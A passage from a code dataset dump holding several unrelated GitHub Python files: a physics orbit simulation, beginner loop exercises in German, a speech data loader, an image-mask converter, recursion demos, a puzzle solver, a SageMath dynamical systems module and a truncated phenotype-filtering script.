Rate:\",accuracy_score(y_test,y_predict))\nprint(\"混淆矩阵:\")\nprint(confusion_matrix(y_test,y_predict))\nprint(\"分类报告:\")\nprint(classification_report(y_test,y_predict))\n\n\n\n","repo_name":"ItsSong/Text-Categorization-and-Topic-mining","sub_path":"10TrainPredict.py","file_name":"10TrainPredict.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20189882917","text":"from numpy import *\r\nimport matplotlib.pyplot as plt\r\n\r\nclass BINARY(object):\r\n def __init__(self, _m1=4*pi*pi, _me=3.*10**(-6), _mj=9.5*10**(-1), _ve0=[0,2.*pi], _vj0=[0,0.88*pi], _dt=0.0001, _time=13):\r\n self.m1=_m1 \r\n self.me=_me\r\n self.mj=_mj\r\n self.x1, self.y1= [1.],[0]\r\n self.vx1, self.vy1= [_ve0[0]],[_ve0[1]]\r\n self.x2, self.y2= [5.2],[0]\r\n self.vx2, self.vy2=[_vj0[0]], [_vj0[1]]\r\n self.dt=_dt\r\n self.time= _time\r\n self.n=int(_time/_dt)\r\n def cal(self):\r\n for i in range(self.n):\r\n self.re=sqrt(self.x1[-1]**2+self.y1[-1]**2)\r\n self.rj=sqrt(self.x2[-1]**2+self.y2[-1]**2)\r\n self.rej=sqrt((self.x1[-1]-self.x2[-1])**2+(self.y1[-1]-self.y2[-1])**2)\r\n self.vx1.append(self.vx1[-1]+self.dt*(-self.m1*self.x1[-1]/self.re**3-self.m1*self.mj*(self.x1[-1]-self.x2[-1])/self.rej**3))\r\n self.vy1.append(self.vy1[-1]+self.dt*(-self.m1*self.y1[-1]/self.re**3-self.m1*self.mj*(self.y1[-1]-self.y2[-1])/self.rej**3))\r\n self.vx2.append(self.vx2[-1]+self.dt*(-self.m1*self.x2[-1]/self.rj**3-self.m1*self.me*(self.x2[-1]-self.x1[-1])/self.rej**3))\r\n self.vy2.append(self.vy2[-1]+self.dt*(-self.m1*self.y2[-1]/self.rj**3-self.m1*self.me*(self.y2[-1]-self.y1[-1])/self.rej**3))\r\n self.x1.append(self.x1[-1]+self.dt*self.vx1[-1])\r\n self.y1.append(self.y1[-1]+self.dt*self.vy1[-1])\r\n self.x2.append(self.x2[-1]+self.dt*self.vx2[-1])\r\n self.y2.append(self.y2[-1]+self.dt*self.vy2[-1])\r\n def plot_trajectory(self,_ax):\r\n _ax.plot(self.x1,self.y1,'-b')\r\n _ax.plot(self.x2,self.y2,'-g')\r\n _ax.plot([self.x1[-1]],[self.y1[-1]],'ob',markersize=8)\r\n _ax.plot([self.x2[-1]],[self.y2[-1]],'og',markersize=10)\r\n _ax.plot(0,0,'or',markersize=15)\r\n \r\n \r\nax1=plt.axes([0.1,0.1,0.7,1.0])\r\nax1.set_xlabel(r'$x$'+' (AU)',fontsize=18)\r\nax1.set_ylabel(r'$y$'+' (AU)',fontsize=18)\r\nax1.set_title('three body orbits',fontsize=18)\r\nax1.text(-5.9,5.3,'$M_J=1000M_J$',fontsize=18)\r\n\r\n\r\ncmp=BINARY()\r\ncmp.cal()\r\ncmp.plot_trajectory(ax1)\r\n\r\nplt.show()","repo_name":"zilongstein/computationalphysics_N2013301020055","sub_path":"chapter4/three body.py","file_name":"three body.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73372184856","text":"\"\"\"\n\"\"\"\n\"\"\"\nWhile-Schleife\n\nBestimmte Programmabschnitte können wiederholt werden. Dies wird z.B: mit der while-Schleife realisiert.\n\"\"\"\n\"\"\"\n# Beispiel 1:\nn = 0\nwhile n < 3:\n print(\"Hallo Welt\")\n n+= 1\n\n# Übung 1:\nrepetition = int(input(\"Bitte gegeben Sie ein wie oft die Ausgabe wiederholt werden soll.\"))\n\nloop_count = 0\nwhile loop_count < repetition:\n print(\"Hallo du.\")\n loop_count +=1\nprint(\"Die Schleife wurde \", loop_count, \"ausgeführt.\")\n\n# Aufgabe 2:\nrepetition = int(input(\"Bitte gegeben Sie ein wie oft die Ausgabe wiederholt werden soll.\"))\nname = input(\"Bitte geben Sie Ihren Namen ein.\")\nloop_count = 0\nwhile loop_count < repetition:\n print(\"Hallo \" + name)\n loop_count += 1\nprint(\"Die Schleife wurde \", loop_count, \"ausgeführt.\")\n\n# Aufgabe 3:\nwalked_km = float(input(\"Bitte geben Sie an wie viele km Sie gegangen sind.\"))\nnumber_of_steps = int((walked_km * 1000 * 100) / 74)\n\nif number_of_steps < 1:\n print(\"Sie sind keinen Schritt gegangen.\")\nelif number_of_steps == 1:\n print(\"Sie sind genau einen Schritt gelaufen.\")\nelse:\n print(\"Bei \", walked_km, \"sind Sie \", number_of_steps, \" Schritte gegangen.\")\n\n# Aufgabe 4\n\nyear = int(input(\"Bitte geben Sie das Jahr ein: \"))\n\nif year % 100 == 0:\n if year % 400 == 0:\n print(\"Es handelt sich um ein Schaltjahr.\")\n else:\n print(\"Es handelt sich um kein Schaltjahr.\")\nelse:\n if year % 4 == 0:\n print(\"Es handelt sich um ein Schaltjahr.\")\n else:\n print(\"Es handelt sich um kein Schaltjahr.\")\n\n# Aufgabe 5:\n# Eingabe der gewünschten Zahl\n num = int(input(\"Gib eine Zahl ein, bis zu der die Fibonacci-Folge generiert werden soll: \"))\n if num < 0:\n print(\"Bitte gib eine nicht-negative Zahl ein.\")\n else:\n a = 0\n b = 1\n while a <= num:\n print(a,end= \" \")\n temp = a\n a = b\n b = temp + b\n\n# Aufgabe 6:\n # mit Break, Continue\n while True:\n num = int(input(\"Geben Sie eine ganze Zahl zwischen 1 und 100 ein: \"))\n\n if num == 0:\n print(\"Programmabbruch! \")\n break\n\n if num < 1 or num > 100:\n print(\"Bitte geben Sie eine Zahl zwischen 1 und 100 ein.\")\n continue\n num_2 = int(input(\"Geben Sie nun eine weitere Zahl ein: \"))\n\n if num_2 < 1 or num > 100:\n print(\"Bitte geben Sie eine Zahl zwischen 1 und 100 ein.\")\n continue\n if num_2 > num:\n print(\"Die aktuelle Eingabe ist größer als die letzte Eingabe.\")\n elif num_2 == num:\n print(\"Die aktuelle Eingabe entspricht der letzten Eingabe.\")\n elif num_2 < num:\n print(\"Die aktuelle Eingabe ist kleiner als die letzte Eingabe.\")\n else:\n print(\"Da ist ein Fehler aufgetreten.\")\n\"\"\"\n# ohne Break; Continue\nloop_on = True\nwhile loop_on:\n num = int(input(\"Geben Sie eine ganze Zahl zwischen 1 und 100 ein: \"))\n if num == 0:\n print(\"Programmabbruch! \")\n loop_on = False\n else:\n if num < 1 or num > 100:\n print(\"Bitte geben Sie eine Zahl zwischen 1 und 100 ein.\")\n else:\n num_2 = int(input(\"Geben Sie nun eine weitere Zahl ein: \"))\n if (num_2 < 1 or num_2 > 100) and num_2 != 0:\n print(\"Bitte geben Sie eine Zahl zwischen 1 und 100 ein.\")\n elif num_2 == 0:\n print(\"Programmabbruch! \")\n loop_on = False\n else:\n if num_2 > num:\n print(\"Die aktuelle Eingabe ist größer als die letzte Eingabe.\")\n elif num_2 == num:\n print(\"Die aktuelle Eingabe entspricht der letzten Eingabe.\")\n elif num_2 < num:\n print(\"Die aktuelle Eingabe ist kleiner als die letzte Eingabe.\")\n else:\n print(\"Da ist ein Fehler aufgetreten.\")\n\n\n","repo_name":"cisick/PG2","sub_path":"While-Schleife.py","file_name":"While-Schleife.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35058626518","text":"#-*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\nfrom hyperparams import Hyperparams as hp\nimport numpy as np\nimport tensorflow as tf\nfrom utils import *\nimport codecs\nimport os\nfrom jamo import h2j\nfrom itertools import chain\n\ndef load_vocab():\n char2idx = {char: idx for idx, char in enumerate(hp.vocab)}\n idx2char = {idx: char for idx, char in enumerate(hp.vocab)}\n return char2idx, idx2char\n\ndef load_data(mode=\"train\"):\n '''Loads data\n Args:\n mode: \"train\" or \"synthesize\".\n '''\n # Load vocabulary\n char2idx, idx2char = load_vocab()\n\n # load conversion dictionaries\n j2hcj, j2sj, j2shcj = load_j2hcj(), load_j2sj(), load_j2shcj()\n\n # Parse\n fpaths, text_lengths, texts = [], [], []\n transcript = os.path.join(hp.data, 'jss.v1.0.txt')\n lines = codecs.open(transcript, 'r', 'utf-8').readlines()\n if mode == \"train\":\n lines = lines[:-100]\n else:\n lines = lines[-100:]\n\n for line in lines:\n fname, text = line.strip().split(\"|\")\n fpath = os.path.join(hp.data, fname)\n fpaths.append(fpath)\n\n text += \"␃\" # ␃: EOS\n if hp.token_type == \"char\": # syllable\n text = list(text)\n else:\n text = [h2j(char) for char in text]\n text = chain.from_iterable(text)\n if hp.token_type == \"j\": # jamo\n text = [h2j(char) for char in text]\n elif hp.token_type == \"sj\": # single jamo\n text = [j2sj.get(j, j) for j in text]\n elif hp.token_type == \"hcj\": # hangul compatibility jamo\n text = [j2hcj.get(j, j) for j in text]\n elif hp.token_type == \"shcj\": # single hangul compatibility jamo\n text = [j2shcj.get(j, j) for j in text]\n text = chain.from_iterable(text)\n\n text = [char2idx[char] for char in text if char in char2idx]\n text_lengths.append(len(text))\n if mode == \"train\":\n texts.append(np.array(text, np.int32).tostring())\n else:\n texts.append(text + [0]*(hp.max_N-len(text)))\n\n return fpaths, text_lengths, texts\n\ndef get_batch():\n \"\"\"Loads training data and put them in queues\"\"\"\n with tf.device('/cpu:0'):\n # Load data\n fpaths, text_lengths, texts = load_data() # list\n maxlen, minlen = max(text_lengths), min(text_lengths)\n print(\"maxlen=\", maxlen, \"minlen=\", minlen)\n\n # Calc total batch count\n num_batch = len(fpaths) // hp.B\n\n # Create Queues\n fpath, text_length, text = tf.train.slice_input_producer([fpaths, text_lengths, texts], shuffle=True)\n\n # Parse\n text = tf.decode_raw(text, tf.int32) # (None,)\n\n fname, mel, mag, t = tf.py_func(load_spectrograms, [fpath], [tf.string, tf.float32, tf.float32, tf.int64])\n gt, = tf.py_func(guided_attention, [text_length, t], [tf.float32])\n\n # Add shape information\n fname.set_shape(())\n text.set_shape((None,))\n mel.set_shape((None, hp.n_mels))\n mag.set_shape((None, hp.n_fft//2+1))\n gt.set_shape((hp.max_N, hp.max_T))\n\n # Batching\n _, (texts, mels, mags, gts, fnames) = tf.contrib.training.bucket_by_sequence_length(\n input_length=text_length,\n tensors=[text, mel, mag, gt, fname],\n batch_size=hp.B,\n bucket_boundaries=[i for i in range(minlen + 1, maxlen - 1, 40)],\n num_threads=8,\n capacity=hp.B*10,\n dynamic_pad=True)\n\n return texts, mels, mags, gts, fnames, num_batch\n","repo_name":"kakaobrain/jejueo","sub_path":"speech/data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"68"} +{"seq_id":"40102731601","text":"import cv2\nimport numpy as np\nfrom pathlib import Path\nfrom typing import Dict, List, Set, Tuple\nfrom utils.image_tool import base64_to_img, save_img\nfrom utils.json_util import load_json\nfrom utils.text_tool import load_lines\n\nDEFAULT_IDX = 255\n\n\ndef txt_to_label(txt_path: str) -> Dict[str, int]:\n\n if txt_path is None:\n return {}\n\n labels = load_lines(txt_path)\n label_to_idx: Dict[str, int] = dict()\n for idx, label in enumerate(labels):\n label_to_idx[label] = idx + 1\n\n return label_to_idx\n\n\ndef gen_ori_img(\n anno: dict,\n target_shape: Tuple[int,\n int]) -> Tuple[np.ndarray, int, int, int, int, float]:\n\n # 1. Base64 轉圖片\n img_base64 = anno.get('imageData')\n img = base64_to_img(img_base64)\n\n # 2. 計算新的圖片尺寸比例\n h, w, _ = img.shape\n w_target, h_target = target_shape\n\n h_ratio = h_target / h\n w_ratio = w_target / w\n ratio = min(h_ratio, w_ratio)\n\n new_h = int(h * ratio)\n new_w = int(w * ratio)\n\n # 3. 縮放圖片\n img_resize = cv2.resize(img, (new_w, new_h), interpolation=cv2.INTER_AREA)\n\n # 4. 計算邊界\n top = int((h_target - new_h) / 2)\n bottom = h_target - new_h - top\n left = int((w_target - new_w) / 2)\n right = w_target - new_w - left\n\n # 5. 填充邊界影像\n img_filled = cv2.copyMakeBorder(img_resize,\n top,\n bottom,\n left,\n right,\n cv2.BORDER_CONSTANT,\n value=(127, 127, 127))\n\n return img_filled, top, bottom, left, right, ratio\n\n\ndef gen_mask(anno: dict, label_to_idx: Dict[str, int],\n target_shape: Tuple[int, int], top: int, left: int,\n ratio: float) -> np.ndarray:\n\n # 1. 取得圖片資料\n shapes = anno.get('shapes')\n\n # 2. 計算所有標籤種類\n label_idxs: Set[int] = set()\n for shape in shapes:\n label = shape.get('label')\n label_idx = label_to_idx.get(label) or DEFAULT_IDX\n label_idxs.add(label_idx)\n\n # 3. 產生Mask\n # 產生空白影像\n label_to_mask: Dict[str, np.ndarray] = dict()\n for label_idx in label_idxs:\n mask = np.zeros((target_shape[1], target_shape[0], 1), np.uint8)\n label_to_mask[label_idx] = mask\n\n # 繪製標記資料(實心填充輪廓)\n for shape in shapes:\n\n # 取得標籤索引\n label = shape.get('label')\n label_idx = label_to_idx.get(label) or DEFAULT_IDX\n\n # 取得輪廓座標點\n points = shape.get('points')\n resize_points: List[List[float, float]] = list()\n for point in points:\n\n # 計算新的座標點\n x, y = point\n x = (x * ratio) + left\n y = (y * ratio) + top\n resize_points.append([x, y])\n\n # 繪製輪廓\n np_points = np.array(resize_points, np.int32)\n mask = label_to_mask.get(label_idx)\n mask = cv2.drawContours(mask, [np_points],\n -1,\n 255,\n -1,\n lineType=cv2.LINE_AA)\n label_to_mask[label_idx] = mask\n\n # 3. 合併 Mask,將有反鋸齒的地方設為該索引\n # NOTE: 這裡為了配合表格的水平線與垂直線,有把重疊的地方設定為3,所以背景=0、水平線=1、垂直線=2、重疊部分=3\n final_mask = np.zeros((target_shape[1], target_shape[0], 1), np.uint8)\n for label_idx, mask in label_to_mask.items():\n mask[mask > 0] = label_idx\n final_mask = final_mask + mask\n\n return final_mask\n\n\ndef anno_to_mask(\n anno_dir: str,\n label_path: str,\n out_img_dir: str,\n out_mask_dir: str,\n target_shape: Tuple[int, int] = (512, 512)) -> None:\n\n # 1. 搜尋檔案路徑\n anno_paths = Path(anno_dir).rglob('*.json')\n\n # 2. 讀取標籤資料\n label_to_idx = txt_to_label(label_path)\n\n # 3. 處理標記資料\n for anno_path in anno_paths:\n\n # 讀取標記資料\n anno = load_json(anno_path)\n if not anno:\n continue\n\n # 原始照片\n img_filled, top, bottom, left, right, ratio = gen_ori_img(\n anno, target_shape)\n img_spath = Path(out_img_dir, f'{anno_path.stem}.jpg')\n save_img(img_filled, img_spath)\n\n # Mask\n mask = gen_mask(anno, label_to_idx, target_shape, top, left, ratio)\n mask_spath = Path(out_mask_dir, f'{anno_path.stem}_mask.png')\n save_img(mask, mask_spath)\n\n\nif __name__ == '__main__':\n\n # 1. 設定參數\n import argparse\n parser = argparse.ArgumentParser(\n description='A tool for convert labelme json to mask image')\n parser.add_argument('-a',\n '--anno_dir',\n type=str,\n default='./json',\n required=False,\n help='Directory to label json files')\n parser.add_argument('-l',\n '--label_path',\n type=str,\n default='./label.txt',\n required=False,\n help='Path to label text(one label per line)')\n parser.add_argument('-oi',\n '--out_img_dir',\n type=str,\n default='./data/imgs',\n required=False,\n help='Directory to output image files')\n parser.add_argument('-om',\n '--out_mask_dir',\n type=str,\n default='./data/masks',\n required=False,\n help='Directory to output mask files')\n\n args = parser.parse_args()\n\n # 2. 執行轉換\n anno_to_mask(args.anno_dir, args.label_path, args.out_img_dir,\n args.out_mask_dir)\n","repo_name":"rinku-1998/labelme-to-maskimg","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19351598089","text":"def factorialRecur(num):\n \"\"\" Taken in an integer and return result of its factorial product using recursion.\"\"\"\n\n # Base Case\n if num == 1:\n return 1\n\n # recursion in the return statement with num-1 as its argument\n return num * factorialRecur(num-1)\n\n\ndef factorialIter(num):\n \"\"\" Taken in an integer and return result of its factorial product using iteration.\"\"\"\n\n total = 1\n\n for i in range(1, num+1):\n total *= i\n\n return total\n\n\nnum = 5\nprint(f\"Recursion: num = {num}, result = {factorialRecur(num)}\")\nprint(f\"Iteration: num = {num}, result = {factorialIter(num)}\")\n\n\n# % from Al Sweigart's youtube video: https://youtu.be/AfBqVVKg4GE\n# % Using iteration to emulate recursion\n\ncallStack = [] # holding the \"frame objects\"\n# \"Call\" the factorial() function\ncallStack.append({\"instrPtr\": \"start\", \"number\": 7})\nreturnValue = None\n\nwhile len(callStack) > 0:\n # The body of the \"factorial() function\":\n\n number = callStack[-1][\"number\"] # Set number \"parameter\"\n instrPtr = callStack[-1][\"instrPtr\"]\n\n if instrPtr == \"start\":\n if number == 1:\n # * Base Case\n returnValue = 1\n callStack.pop() # \"return\" from \"function all\"\n continue\n else:\n # * Recursive Case\n callStack[-1][\"instrPtr\"] = \"after recursive call\"\n # \"Call\" the \"factorial() function\":\n callStack.append({\"instrPtr\": \"start\", \"number\": number-1})\n continue\n elif instrPtr == \"after recursive call\":\n returnValue *= number\n callStack.pop() # \"return from function call\"\n\n# print(returnValue)\n\n# @ Tail Call Optimization/Elimination (TCO)\n# @ In code, tail call optimization/elimination is when the recursive function call is the last thing in the function before it returns:\n# @ def recursiveFunc(params):\n# @ # blah blah blah\n# @ return recursiveFunc(params)\n# @\n# @ You won't need to hold on to local variables, because there's no code after the recursive call that will need them\n# @\n# @ There is no need to keep the frame object on the call stack\n# @\n# @ TCO prevents stack overflow since you can go beyond 1000 function calls\n# @\n# @ Example:\n\n\ndef factorial(number, accumulator=1): # will only run up to number=997\n if number == 0:\n # BASE CASE\n return accumulator\n else:\n # RECURSIVE CASE\n return factorial(number-1, number*accumulator)\n\n\n# print(factorial(997))\n","repo_name":"ichan266/Code-Challenges","sub_path":"recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24816529585","text":"import sys\n\nwith open(sys.argv[1], 'r') as f:\n tiles_raw = f.read().strip().split('\\n\\n')\n\ntiles = {}\n\nfor raw_tile in tiles_raw:\n lines = raw_tile.strip('\\n').split('\\n')\n idn = int(lines[0].split()[1].strip(':'))\n grid = lines[1:]\n sides = [\n\t\t\tgrid[0],\n\t\t\tgrid[-1],\n\t\t\t''.join([g[0] for g in grid]),\n\t\t\t''.join([g[-1] for g in grid])\n\t\t]\n sides += [s[::-1] for s in sides]\n tiles[idn] = {\"grid\": grid, \"sides\": sides, 'neighbors': {}}\n\n for i, tile in tiles.items():\n if i == idn:\n continue\n shared = [s for s in tile['sides'] if s in sides]\n for s in shared:\n tiles[idn]['neighbors'][i] = s\n tiles[i]['neighbors'][idn] = s\n\n# With that information, finding the corners is just finding the tiles with only two neighbors:\n\ncorners = list(map(int, [t for t in tiles if len(tiles[t]['neighbors']) == 2]))\nres = 1\nfor c in corners:\n res *= c\n\nprint(f'Part 1: {res}')\n","repo_name":"bobrippling/advent-of-code","sub_path":"2020/20/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"6590819196","text":"r\"\"\"\nGeneric dynamical systems on schemes\n\nThis is the generic class for dynamical systems and contains the exported\nconstructor functions. The constructor functions can take either polynomials\n(or rational functions in the affine case) or morphisms from which to\nconstruct a dynamical system. If the domain is not specified, it is\nconstructed. However, if you plan on working with points or subvarieties\nin the domain, it recommended to specify the domain. For products of\nprojective spaces the domain must be specified.\n\nThe initialization checks are always performed by the constructor functions.\nIt is possible, but not recommended, to skip these checks by calling the\nclass initialization directly.\n\nAUTHORS:\n\n- Ben Hutz (July 2017): initial version\n\"\"\"\n\n#*****************************************************************************\n# Copyright (C) 2017 Ben Hutz \n#\n# Distributed under the terms of the GNU General Public License (GPL)\n# as published by the Free Software Foundation; either version 2 of\n# the License, or (at your option) any later version.\n# http://www.gnu.org/licenses/\n#*****************************************************************************\n\nfrom __future__ import absolute_import, print_function\nfrom sage.categories.homset import End\nfrom six import add_metaclass\nfrom sage.misc.inherit_comparison import InheritComparisonClasscallMetaclass\nfrom sage.schemes.generic.morphism import SchemeMorphism_polynomial\nfrom sage.schemes.affine.affine_space import is_AffineSpace\nfrom sage.schemes.affine.affine_subscheme import AlgebraicScheme_subscheme_affine\n\n@add_metaclass(InheritComparisonClasscallMetaclass)\nclass DynamicalSystem(SchemeMorphism_polynomial):\n r\"\"\"\n Base class for dynamical systems of schemes.\n\n INPUT:\n\n - ``polys_or_rat_fncts`` -- a list of polynomials or rational functions,\n all of which should have the same parent\n\n - ``domain`` -- an affine or projective scheme, or product of\n projective schemes, on which ``polys`` defines an endomorphism.\n Subschemes are also ok\n\n - ``names`` -- (default: ``('X', 'Y')``) tuple of strings to be used\n as coordinate names for a projective space that is constructed\n\n The following combinations of ``morphism_or_polys`` and\n ``domain`` are meaningful:\n\n * ``morphism_or_polys`` is a SchemeMorphism; ``domain`` is\n ignored in this case\n\n * ``morphism_or_polys`` is a list of homogeneous polynomials\n that define a rational endomorphism of ``domain``\n\n * ``morphism_or_polys`` is a list of homogeneous polynomials and\n ``domain`` is unspecified; ``domain`` is then taken to be the\n projective space of appropriate dimension over the base ring of\n the first element of ``morphism_or_polys``\n\n * ``morphism_or_polys`` is a single polynomial or rational\n function; ``domain`` is ignored and taken to be a\n 1-dimensional projective space over the base ring of\n ``morphism_or_polys`` with coordinate names given by ``names``\n\n EXAMPLES::\n\n sage: A. = AffineSpace(QQ,1)\n sage: f = DynamicalSystem_affine([x^2+1])\n sage: type(f)\n \n\n ::\n\n sage: P. = ProjectiveSpace(QQ,1)\n sage: f = DynamicalSystem_projective([x^2+y^2, y^2])\n sage: type(f)\n \n\n ::\n\n sage: P1. = ProjectiveSpace(CC,1)\n sage: H = End(P1)\n sage: DynamicalSystem(H([y, x]))\n Dynamical System of Projective Space of dimension 1 over Complex Field\n with 53 bits of precision\n Defn: Defined on coordinates by sending (x : y) to\n (y : x)\n\n :class:`DynamicalSystem` defaults to projective::\n\n sage: R. = QQ[]\n sage: DynamicalSystem([x^2, y^2, z^2])\n Dynamical System of Projective Space of dimension 2 over Rational Field\n Defn: Defined on coordinates by sending (x : y : z) to\n (x^2 : y^2 : z^2)\n\n ::\n\n sage: A. = AffineSpace(QQ, 2)\n sage: DynamicalSystem([y, x], domain=A)\n Dynamical System of Affine Space of dimension 2 over Rational Field\n Defn: Defined on coordinates by sending (x, y) to\n (y, x)\n sage: H = End(A)\n sage: DynamicalSystem(H([y, x]))\n Dynamical System of Affine Space of dimension 2 over Rational Field\n Defn: Defined on coordinates by sending (x, y) to\n (y, x)\n \"\"\"\n\n @staticmethod\n def __classcall_private__(cls, morphism_or_polys, domain=None, names=None):\n r\"\"\"\n Return the appropriate dynamical system on a scheme.\n\n EXAMPLES::\n\n sage: R. = QQ[]\n sage: DynamicalSystem(t^2 - 3)\n Dynamical System of Projective Space of dimension 1 over Rational Field\n Defn: Defined on coordinates by sending (X : Y) to\n (X^2 - 3*Y^2 : Y^2)\n \"\"\"\n if isinstance(morphism_or_polys, SchemeMorphism_polynomial):\n domain = morphism_or_polys.domain()\n if not domain is None:\n if is_AffineSpace(domain) or isinstance(domain, AlgebraicScheme_subscheme_affine):\n from sage.dynamics.arithmetic_dynamics.affine_ds import DynamicalSystem_affine\n return DynamicalSystem_affine(morphism_or_polys, domain)\n\n from sage.dynamics.arithmetic_dynamics.projective_ds import DynamicalSystem_projective\n return DynamicalSystem_projective(morphism_or_polys, domain, names)\n\n def __init__(self, polys_or_rat_fncts, domain):\n r\"\"\"\n The Python constructor.\n\n EXAMPLES::\n\n sage: from sage.dynamics.arithmetic_dynamics.generic_ds import DynamicalSystem\n sage: P. = ProjectiveSpace(QQ,1)\n sage: f = DynamicalSystem_projective([x^2+y^2, y^2])\n sage: isinstance(f, DynamicalSystem)\n True\n \"\"\"\n H = End(domain)\n # All consistency checks are done by the public class constructors,\n # so we can set check=False here.\n SchemeMorphism_polynomial.__init__(self, H, polys_or_rat_fncts, check=False)\n\n def _repr_type(self):\n r\"\"\"\n Return a string representation of the type of a dynamical system.\n\n OUTPUT: string\n\n EXAMPLES::\n\n sage: PS. = ProjectiveSpace(QQ,1)\n sage: f = DynamicalSystem_projective([x^3, x*y^2])\n sage: f._repr_type()\n 'Dynamical System'\n \"\"\"\n return \"Dynamical System\"\n\n def _repr_(self):\n r\"\"\"\n Return a string representation of a dynamical system.\n\n OUTPUT: string\n\n EXAMPLES::\n\n sage: PS. = ProjectiveSpace(QQ,1)\n sage: f = DynamicalSystem_projective([x^3, x*y^2])\n sage: f._repr_()\n 'Dynamical System of Projective Space of dimension 1 over Rational Field\\n\n Defn: Defined on coordinates by sending (x : y) to\\n (x^3 : x*y^2)'\n \"\"\"\n s = \"%s of %s\"%(self._repr_type(), self.domain())\n d = self._repr_defn()\n if d != '':\n s += \"\\n Defn: %s\"%('\\n '.join(self._repr_defn().split('\\n')))\n return s\n\n def as_scheme_morphism(self):\n \"\"\"\n Return this dynamical system as :class:`SchemeMorphism_polynomial`.\n\n OUTPUT: :class:`SchemeMorphism_polynomial`\n\n EXAMPLES::\n\n sage: P. = ProjectiveSpace(ZZ, 2)\n sage: f = DynamicalSystem_projective([x^2, y^2, z^2])\n sage: type(f.as_scheme_morphism())\n \n\n ::\n\n sage: P. = ProjectiveSpace(QQ, 1)\n sage: f = DynamicalSystem_projective([x^2-y^2, y^2])\n sage: type(f.as_scheme_morphism())\n \n\n ::\n\n sage: P. = ProjectiveSpace(GF(5), 1)\n sage: f = DynamicalSystem_projective([x^2, y^2])\n sage: type(f.as_scheme_morphism())\n \n\n ::\n\n sage: A. = AffineSpace(ZZ, 2)\n sage: f = DynamicalSystem_affine([x^2-2, y^2])\n sage: type(f.as_scheme_morphism())\n \n\n ::\n\n sage: A. = AffineSpace(QQ, 2)\n sage: f = DynamicalSystem_affine([x^2-2, y^2])\n sage: type(f.as_scheme_morphism())\n \n\n ::\n\n sage: A. = AffineSpace(GF(3), 2)\n sage: f = DynamicalSystem_affine([x^2-2, y^2])\n sage: type(f.as_scheme_morphism())\n \n \"\"\"\n H = End(self.domain())\n return H(list(self))\n\n def change_ring(self, R, check=True):\n r\"\"\"\n Return a new dynamical system which is this map coerced to ``R``.\n\n If ``check`` is ``True``, then the initialization checks are performed.\n\n INPUT:\n\n - ``R`` -- ring or morphism\n\n OUTPUT:\n\n A new :class:`DynamicalSystem_projective` that is this map\n coerced to ``R``.\n\n EXAMPLES::\n\n sage: P. = ProjectiveSpace(ZZ, 1)\n sage: f = DynamicalSystem_projective([3*x^2, y^2])\n sage: f.change_ring(GF(5))\n Dynamical System of Projective Space of dimension 1 over Finite Field of size 5\n Defn: Defined on coordinates by sending (x : y) to\n (-2*x^2 : y^2)\n \"\"\"\n f = self.as_scheme_morphism()\n F = f.change_ring(R)\n return F.as_dynamical_system()\n\n def specialization(self, D=None, phi=None, homset=None):\n r\"\"\"\n Specialization of this dynamical system.\n\n Given a family of maps defined over a polynomial ring. A\n specialization is a particular member of that family. The\n specialization can be specified either by a dictionary or\n a :class:`SpecializationMorphism`.\n\n INPUT:\n\n - ``D`` -- (optional) dictionary\n\n - ``phi`` -- (optional) SpecializationMorphism\n\n - ``homset`` -- (optional) homset of specialized map\n\n OUTPUT: :class:`DynamicalSystem`\n\n EXAMPLES::\n\n sage: R. = PolynomialRing(QQ)\n sage: P. = ProjectiveSpace(R, 1)\n sage: f = DynamicalSystem_projective([x^2 + c*y^2,y^2], domain=P)\n sage: f.specialization({c:1})\n Dynamical System of Projective Space of dimension 1 over Rational Field\n Defn: Defined on coordinates by sending (x : y) to\n (x^2 + y^2 : y^2)\n \"\"\"\n F = self.as_scheme_morphism().specialization(D, phi, homset)\n return F.as_dynamical_system()\n\n","repo_name":"filipion/coding-theory","sub_path":"src/sage/dynamics/arithmetic_dynamics/generic_ds.py","file_name":"generic_ds.py","file_ext":"py","file_size_in_byte":11381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24615914762","text":"#!/usr/bin/env python3\n\n\"\"\"\nInput:\n-- FAM file : the fam file of the data we want to analyse\n-- data is the phenotype file, likely a superset of PLINK data\n-- cov_list : list of comma-separated strings\n-- pheno : single phenotype label\n-- dataout : name of a phenotype file that gets created by the script. There is guaranteed no missing phenotype data in the file, and\n only contains individuals described in the fam file -- not guaranteed that it's in the same order as the fam file\n-- ind_list: subset of the individuals in the fam file for (a) no missing genotype data (b) no missing phenotype data\n\n\"\"\"\n\nimport sys\nimport pandas as pd\nimport argparse\nimport numpy as np\n\n\n\n\ndef check_missing(x):\n if x in [\"NA\",\"na\",\"null\",\"-9\"] or ((type(x)==type(\"x\")) and (len(x)<1)) or x==-9 or x==r\"\\N\" or x==\"-\":\n return 1\n else:\n return 0\n\ndef parseArguments():\n parser = argparse.ArgumentParser(description='fill in missing bim values')\n parser.add_argument('--inp_fam',type=str,required=True)\n parser.add_argument('--data',type=str,required=True,help=\"File with phenotype and covariate data\")\n parser.add_argument('--cov_list', type=str,help=\"comma separated list of covariates\",default=\"\")\n parser.add_argument('--pheno',type=str,required=True,help=\"single phenotype\")\n parser.add_argument('--dataout',type=str,required=True,help=\"File with output pheno\")\n parser.add_argument('--lindout',type=str,required=True,help=\"File with list of good individuals FID IID \")\n args = parser.parse_args()\n return args\n\ndef getColNames(label_str):\n col_names = []\n 